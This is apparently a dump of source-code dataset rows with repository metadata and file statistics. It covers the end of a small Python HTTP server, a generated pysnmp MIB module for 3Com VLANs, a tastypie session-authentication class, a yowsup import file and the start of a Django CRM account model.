#def log_message(self, format, *args):
# suppress logging per request
#return
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
if __name__ == '__main__':
print('Imagemagick server starts')
httpd = ThreadingSimpleServer(('0.0.0.0', 1345), Handler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Imagemagick server stops')
| 30.831325
| 66
| 0.5932
| 945
| 0.369285
| 0
| 0
| 0
| 0
| 0
| 0
| 800
| 0.312622
|
775d1ff6bf052dcb5d8a678cb806eb618f0ebf92
| 26,692
|
py
|
Python
|
pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module GENERIC-3COM-VLAN-MIB-1-0-7 (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/GENERIC-3COM-VLAN-MIB-1-0-7
# Produced by pysmi-0.3.4 at Wed May 1 11:09:00 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
NotificationType, Counter32, Integer32, ObjectIdentity, Counter64, IpAddress, MibIdentifier, iso, ModuleIdentity, Unsigned32, Gauge32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, enterprises = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Counter32", "Integer32", "ObjectIdentity", "Counter64", "IpAddress", "MibIdentifier", "iso", "ModuleIdentity", "Unsigned32", "Gauge32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "enterprises")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
class RowStatus(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))
namedValues = NamedValues(("active", 1), ("notInService", 2), ("notReady", 3), ("createAndGo", 4), ("createAndWait", 5), ("destroy", 6))
a3Com = MibIdentifier((1, 3, 6, 1, 4, 1, 43))
generic = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10))
genExperimental = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1))
genVirtual = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14))
a3ComVlanGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1))
a3ComVlanProtocolsGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2))
a3ComVirtualGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 3))
a3ComEncapsulationGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4))
class A3ComVlanType(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20))
namedValues = NamedValues(("vlanLayer2", 1), ("vlanUnspecifiedProtocols", 2), ("vlanIPProtocol", 3), ("vlanIPXProtocol", 4), ("vlanAppleTalkProtocol", 5), ("vlanXNSProtocol", 6), ("vlanISOProtocol", 7), ("vlanDECNetProtocol", 8), ("vlanNetBIOSProtocol", 9), ("vlanSNAProtocol", 10), ("vlanVINESProtocol", 11), ("vlanX25Protocol", 12), ("vlanIGMPProtocol", 13), ("vlanSessionLayer", 14), ("vlanNetBeui", 15), ("vlanLayeredProtocols", 16), ("vlanIPXIIProtocol", 17), ("vlanIPX8022Protocol", 18), ("vlanIPX8023Protocol", 19), ("vlanIPX8022SNAPProtocol", 20))
class A3ComVlanLayer3Type(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13))
namedValues = NamedValues(("vlanIPProtocol", 1), ("vlanIPXProtocol", 2), ("vlanAppleTalkProtocol", 3), ("vlanXNSProtocol", 4), ("vlanSNAProtocol", 5), ("vlanDECNetProtocol", 6), ("vlanNetBIOSProtocol", 7), ("vlanVINESProtocol", 8), ("vlanX25Protocol", 9), ("vlanIPXIIProtocol", 10), ("vlanIPX8022Protocol", 11), ("vlanIPX8023Protocol", 12), ("vlanIPX8022SNAPProtocol", 13))
class A3ComVlanModeType(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("vlanUseDefault", 1), ("vlanOpen", 2), ("vlanClosed", 3))
a3ComVlanGlobalMappingTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1), )
if mibBuilder.loadTexts: a3ComVlanGlobalMappingTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingTable.setDescription('This table lists VLAN interfaces that are globally identified. A single entry exists in this list for each VLAN interface in the system that is bound to a global identifier.')
a3ComVlanGlobalMappingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanGlobalMappingIdentifier"))
if mibBuilder.loadTexts: a3ComVlanGlobalMappingEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingEntry.setDescription('An individual VLAN interface global mapping entry. Entries in this table are created by setting the a3ComVlanIfGlobalIdentifier object in the a3ComVlanIfTable to a non-zero value.')
a3ComVlanGlobalMappingIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535)))
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIdentifier.setDescription('An index into the a3ComVlanGlobalMappingTable and an administratively assigned global VLAN identifier. The value of this object globally identifies the VLAN interface. For VLAN interfaces, on different network devices, which are part of the same globally identified VLAN, the value of this object will be the same.')
a3ComVlanGlobalMappingIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIfIndex.setDescription('The value of a3ComVlanIfIndex for the VLAN interface in the a3ComVlanIfTable, which is bound to the global identifier specified by this entry.')
a3ComVlanIfTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2), )
if mibBuilder.loadTexts: a3ComVlanIfTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfTable.setDescription('This table lists VLAN interfaces that exist within a device. A single entry exists in this list for each VLAN interface in the system. A VLAN interface may be created, destroyed and/or mapped to a globally identified vlan.')
a3ComVlanIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanIfIndex"))
if mibBuilder.loadTexts: a3ComVlanIfEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfEntry.setDescription('An individual VLAN interface entry. When an NMS wishes to create a new entry in this table, it must obtain a non-zero index from the a3ComNextAvailableVirtIfIndex object. Row creation in this table will fail if the chosen index value does not match the current value returned from the a3ComNextAvailableVirtIfIndex object.')
a3ComVlanIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfIndex.setDescription("The index value of this row and the vlan's ifIndex in the ifTable. The NMS obtains the index value for this row by reading the a3ComNextAvailableVirtIfIndex object.")
a3ComVlanIfDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfDescr.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfDescr.setDescription('This is a description of the VLAN interface.')
a3ComVlanIfType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 3), A3ComVlanType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfType.setDescription('The VLAN interface type.')
a3ComVlanIfGlobalIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfGlobalIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfGlobalIdentifier.setDescription('An administratively assigned global VLAN identifier. For VLAN interfaces, on different network devices, which are part of the same globally identified VLAN, the value of this object will be the same. The binding between a global identifier and a VLAN interface can be created or removed. To create a binding an NMS must write a non-zero value to this object. To delete a binding, the NMS must write a zero to this object.')
a3ComVlanIfInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 5), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComVlanIfInfo.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfInfo.setDescription('A TLV encoded information string for the VLAN interface. The information contained within this string corresponds to VLAN information not contained within this table, but contained elsewhere within this MIB module. The purpose of this string is to provide an NMS with a quick read mechanism of all related VLAN interface information. The encoding rules are defined according to: tag = 2 bytes length = 2 bytes value = n bytes The following tags are defined: TAG OBJECT DESCRIPTION 1 a3ComIpVlanIpNetAddress IP Network Address of IP VLAN 2 a3ComIpVlanIpNetMask IP Network Mask of IP VLAN')
a3ComVlanIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 6), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfStatus.setDescription('The status column for this VLAN interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptible to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the creation request. Setting this object to createAndWait(5) causes a row in in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptible to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). When the state of the row transitions to active(1), the agent creates the corresponding row in the ifTable.. Setting this object to destroy(6) will remove the corresponding VLAN interface, remove the entry in this table, and the corresponding entries in the a3ComVlanGlobalMappingTable and the ifTable. In order for a set of this object to destroy(6) to succeed, all dependencies on this row must have been removed. These will include any stacking dependencies in the ifStackTable and any protocol specific tables dependencies.')
a3ComVlanIfModeType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 7), A3ComVlanModeType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfModeType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfModeType.setDescription(' The VLAN mode type for this interface. This object can be set to: usedefault(1) open(2) closed(3) UseDefault Vlans: uses the bridge Vlan Mode value. The bridge Vlan Mode Value can be set to : Open, Closed or Mixed. Open VLANs: have no requirements about relationship between the bridge port that a frame was received upon and the bridge port(s) that it is transmitted on. All open VLANs within the bridge will share the same address table. Closed VLANs: require that the bridge port that a frame is received on is the same VLAN interface as the bridge port(s) that a frame is transmitted on. Each closed VLAN within the bridge will have its own address table.')
a3ComIpVlanTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1), )
if mibBuilder.loadTexts: a3ComIpVlanTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanTable.setDescription('A list of IP VLAN interface information entries. Entries in this table are related to entries in the a3ComVlanIfTable by using the same index.')
a3ComIpVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanIfIndex"))
if mibBuilder.loadTexts: a3ComIpVlanEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanEntry.setDescription('A a3ComIpVlanEntry contains layer 3 information about a particular IP VLAN interface. Note entries in this table cannot be deleted until the entries in the ifStackTable that produce overlap are removed.')
a3ComIpVlanIpNetAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 1), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanIpNetAddress.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanIpNetAddress.setDescription('The IP network number for the IP VLAN interface defined in the a3ComVlanIfTable identified with the same index. The IpNetAdress and the IpNetMask must be set and the the row creation process completed by a NMS before overlapping rows in the ifStackTable can be created. Sets to the ifStackTable that produce overlapping IP IP VLAN interfaces will fail if this object is not set.')
a3ComIpVlanIpNetMask = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 2), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanIpNetMask.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanIpNetMask.setDescription('The IP network mask corresponding to the IP Network address defined by a3ComIpVlanIpNetAddress. The IpNetAdress and the IpNetMask must be set and the row creation process completed by a NMS before overlapping rows in the ifStackTable can be created. Sets to the ifStackTable that produce overlapping IP VLAN interfaces will fail if this object is not set.')
a3ComIpVlanStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 3), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanStatus.setDescription('The status column for this IP VLAN entry. This object can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptible to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the row creation request. Setting this object to createAndWait(5) causes a row in in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptible to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). When the status changes to active(1), the agent applies the IP parmeters to the IP VLAN interface identified by the corresponding value of the a3ComIpVlanIndex object. Setting this object to destroy(6) will remove the IP parmeters from the IP VLAN interface and remove the entry from this table. Setting this object to destroy(6) will remove the layer 3 information from the IP VLAN interface and will remove the row from this table. Note that this action cannot be performed if there are ifStackTable entries that result in overlapping IP VLAN interfaces. Note that these dependencies must be removed first.')
a3ComVlanProtocolTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2), )
if mibBuilder.loadTexts: a3ComVlanProtocolTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolTable.setDescription('This table lists the configured protocols per Vlan. A single entry exists in this list for each protocol configured on a VLAN interface. The a3ComVlanIfType object in a3ComVlanIfTable has to be set to vlanLayeredProtocols in order to use this table.')
a3ComVlanProtocolEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanProtocolIfIndex"), (0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanProtocolIndex"))
if mibBuilder.loadTexts: a3ComVlanProtocolEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolEntry.setDescription('A a3ComVlanProtocolEntry contains a single VLAN to protocol entry.')
a3ComVlanProtocolIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanProtocolIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolIfIndex.setDescription("The first indice of this row and the vlan's ifIndex in the ifTable. The value of this object is the same as the corresponding a3ComVlanIfIndex in the a3ComVlanTable.")
a3ComVlanProtocolIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 2), A3ComVlanLayer3Type())
if mibBuilder.loadTexts: a3ComVlanProtocolIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolIndex.setDescription('The second indice of this row, which identifies one of possible many protocols associated with the VLAN interface identified by this entries first indice. The values are based on the layer 3 protocols specified in A3ComVlanType')
a3ComVlanProtocolStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 3), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanProtocolStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolStatus.setDescription('The status column for this VLAN interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptible to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the creation request. Setting this object to createAndWait(5) causes a row in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptable to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). Row creation to this table is only possible when a corresponding VLAN entry has been created in the a3ComVlanTable with an a3ComVlanType set to vlanLayeredProtocols(16). Setting this object to destroy(6) will remove the corresponding VLAN interface to protocol mapping.')
class A3ComVlanEncapsType(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("vlanEncaps3ComProprietaryVLT", 1), ("vlanEncaps8021q", 2), ("vlanEncapsPre8021qONcore", 3))
a3ComVlanEncapsIfTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1), )
if mibBuilder.loadTexts: a3ComVlanEncapsIfTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfTable.setDescription('This table lists VLAN encapsulation interfaces that exist within a device. A single entry exists in this list for each VLAN encapsulation interface in the system. A VLAN encapsulation interface may be created or destroyed.')
a3ComVlanEncapsIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanEncapsIfIndex"))
if mibBuilder.loadTexts: a3ComVlanEncapsIfEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfEntry.setDescription('An individual VLAN encapsulation interface entry. When an NMS wishes to create a new entry in this table, it must obtain a non-zero index from the a3ComNextAvailableVirtIfIndex object. Row creation in this table will fail if the chosen index value does not match the current value returned from the a3ComNextAvailableVirtIfIndex object.')
a3ComVlanEncapsIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanEncapsIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfIndex.setDescription("The index value of this row and the encapsulation interface's ifIndex in the ifTable. The NMS obtains the index value used for creating a row in this table by reading the a3ComNextAvailableVirtIfIndex object.")
a3ComVlanEncapsIfType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 2), A3ComVlanEncapsType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfType.setDescription('The encapsulation algorithm used when encapsulating packets transmitted, or de-encapsulating packets received through this interface.')
a3ComVlanEncapsIfTag = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfTag.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfTag.setDescription('The tag used when encapsulating packets transmitted, or de-encapsulating packets received through this interface.')
a3ComVlanEncapsIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 4), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfStatus.setDescription('The row status for this VLAN encapsulation interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notReady(3). In order for a row to become active, the NMS must set a3ComVlanEncapsIfTagType and a3ComVlanEncapsIfTag to some valid and consistent values. Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row, the agent will create the row and change the status to active(1). If any of the necessary objects are not available, or specify an invalid configuration, the row will not be created and the agent will return an appropriate error. Setting this object to createAndWait(5) causes a row in in this table to be created. If all necessary objects in the row have been assigned values and specify a valid configuration, the status of the row will be set to notInService(2); otherwise, the status will be set to notReady(3). This object may only be set to createAndGo(4) or createAndWait(5) if it does not exist. Setting this object to active(1) when the status is notInService(2) causes the agent to commit the row. Setting this object to active(1) when its value is already active(1) is a no-op. Setting this object to destroy(6) will remove the corresponding VLAN encapsulation interface, remote the entry in this table, and remove the corresponding entry in the ifTable. In order for a set of this object to destroy(6) to succeed, all dependencies on this row must have been removed. These will include any references to this interface in the ifStackTable.')
a3ComNextAvailableVirtIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 3, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComNextAvailableVirtIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComNextAvailableVirtIfIndex.setDescription("The value of the next available virtual ifIndex. This object is used by an NMS to select an index value for row-creation in tables indexed by ifIndex. The current value of this object is changed to a new value when the current value is written to an agent's table, that is indexed by ifIndex. Row creation using the current value of this object, allocates a virtual ifIndex. Note the following: 1. A newly created row does not have to be active(1) for the agent to allocate the virtual ifIndex. 2. Race conditions between multiple NMS's end when a row is created. Rows are deemed created when a setRequest is successfully committed (i.e. the errorStats is noError(0)). 3. An agent that exhausts its supply of virual ifIndex values returns zero as the value of this object. This can be used by an NMS as an indication to deleted unused rows and reboot the device.")
mibBuilder.exportSymbols("GENERIC-3COM-VLAN-MIB-1-0-7", a3ComVlanEncapsIfStatus=a3ComVlanEncapsIfStatus, a3ComEncapsulationGroup=a3ComEncapsulationGroup, A3ComVlanLayer3Type=A3ComVlanLayer3Type, a3ComVlanIfTable=a3ComVlanIfTable, generic=generic, a3ComIpVlanTable=a3ComIpVlanTable, a3ComVlanIfModeType=a3ComVlanIfModeType, a3ComVlanProtocolTable=a3ComVlanProtocolTable, a3ComVirtualGroup=a3ComVirtualGroup, A3ComVlanType=A3ComVlanType, a3ComIpVlanIpNetMask=a3ComIpVlanIpNetMask, a3ComVlanGlobalMappingTable=a3ComVlanGlobalMappingTable, a3ComVlanEncapsIfIndex=a3ComVlanEncapsIfIndex, a3ComIpVlanIpNetAddress=a3ComIpVlanIpNetAddress, a3ComVlanProtocolIndex=a3ComVlanProtocolIndex, a3ComVlanGlobalMappingEntry=a3ComVlanGlobalMappingEntry, a3ComVlanEncapsIfTag=a3ComVlanEncapsIfTag, a3ComVlanIfIndex=a3ComVlanIfIndex, a3ComNextAvailableVirtIfIndex=a3ComNextAvailableVirtIfIndex, a3ComVlanIfDescr=a3ComVlanIfDescr, a3ComVlanIfStatus=a3ComVlanIfStatus, a3ComVlanGlobalMappingIfIndex=a3ComVlanGlobalMappingIfIndex, a3ComVlanEncapsIfEntry=a3ComVlanEncapsIfEntry, a3ComVlanEncapsIfTable=a3ComVlanEncapsIfTable, a3ComVlanIfGlobalIdentifier=a3ComVlanIfGlobalIdentifier, a3ComVlanIfInfo=a3ComVlanIfInfo, a3ComVlanProtocolIfIndex=a3ComVlanProtocolIfIndex, genVirtual=genVirtual, RowStatus=RowStatus, a3ComIpVlanEntry=a3ComIpVlanEntry, a3ComVlanIfEntry=a3ComVlanIfEntry, a3ComVlanProtocolEntry=a3ComVlanProtocolEntry, A3ComVlanModeType=A3ComVlanModeType, a3ComIpVlanStatus=a3ComIpVlanStatus, a3Com=a3Com, a3ComVlanGroup=a3ComVlanGroup, a3ComVlanEncapsIfType=a3ComVlanEncapsIfType, a3ComVlanProtocolStatus=a3ComVlanProtocolStatus, a3ComVlanIfType=a3ComVlanIfType, a3ComVlanProtocolsGroup=a3ComVlanProtocolsGroup, A3ComVlanEncapsType=A3ComVlanEncapsType, a3ComVlanGlobalMappingIdentifier=a3ComVlanGlobalMappingIdentifier, genExperimental=genExperimental)
| 200.691729
| 1,838
| 0.790536
| 2,019
| 0.075641
| 0
| 0
| 0
| 0
| 0
| 0
| 15,453
| 0.578938
|
775ee35015e7fb1a1d56468e759eea466f2753f3
| 388
|
py
|
Python
|
uberlearner/main/api/authentication.py
|
Uberlearner/uberlearner
|
421391c3c838bf8f88eed47646226fe8dc22d061
|
[
"MIT"
] | 1
|
2020-10-17T04:41:47.000Z
|
2020-10-17T04:41:47.000Z
|
uberlearner/main/api/authentication.py
|
Uberlearner/uberlearner
|
421391c3c838bf8f88eed47646226fe8dc22d061
|
[
"MIT"
] | null | null | null |
uberlearner/main/api/authentication.py
|
Uberlearner/uberlearner
|
421391c3c838bf8f88eed47646226fe8dc22d061
|
[
"MIT"
] | null | null | null |
from tastypie.authentication import SessionAuthentication
class UberAuthentication(SessionAuthentication):
"""
Handles authentication for the course resources.
"""
def is_authenticated(self, request, **kwargs):
if request.method == 'GET':
return True
else:
return super(UberAuthentication, self).is_authenticated(request, **kwargs)
| 35.272727
| 86
| 0.693299
| 329
| 0.847938
| 0
| 0
| 0
| 0
| 0
| 0
| 69
| 0.177835
|
91f204cefc1e11f78d143865718a0720e6b49302
| 135
|
py
|
Python
|
libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py
|
akshitpradhan/TomHack
|
837226e7b38de1140c19bc2d478eeb9e379ed1fd
|
[
"MIT"
] | 22
|
2017-07-14T20:01:17.000Z
|
2022-03-08T14:22:39.000Z
|
libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py
|
akshitpradhan/TomHack
|
837226e7b38de1140c19bc2d478eeb9e379ed1fd
|
[
"MIT"
] | 6
|
2017-07-14T21:03:50.000Z
|
2021-06-10T19:08:32.000Z
|
libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py
|
akshitpradhan/TomHack
|
837226e7b38de1140c19bc2d478eeb9e379ed1fd
|
[
"MIT"
] | 13
|
2017-07-14T20:13:14.000Z
|
2020-11-12T08:06:05.000Z
|
from .layer_send import AxolotlSendLayer
from .layer_control import AxolotlControlLayer
from .layer_receive import AxolotlReceivelayer
| 33.75
| 46
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
91f2badbe46ccc2afa070e8ea0d95aa258e9f159
| 3,199
|
py
|
Python
|
accounts/models.py
|
MrEscape54/CRM
|
36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3
|
[
"MIT"
] | null | null | null |
accounts/models.py
|
MrEscape54/CRM
|
36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3
|
[
"MIT"
] | null | null | null |
accounts/models.py
|
MrEscape54/CRM
|
36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.urls import reverse
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from django.core.validators import RegexValidator
from core import utils
from core.models import User
from contacts.models import Contact
class ActiveParentManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(is_active=True)
class ParentAccount(models.Model):
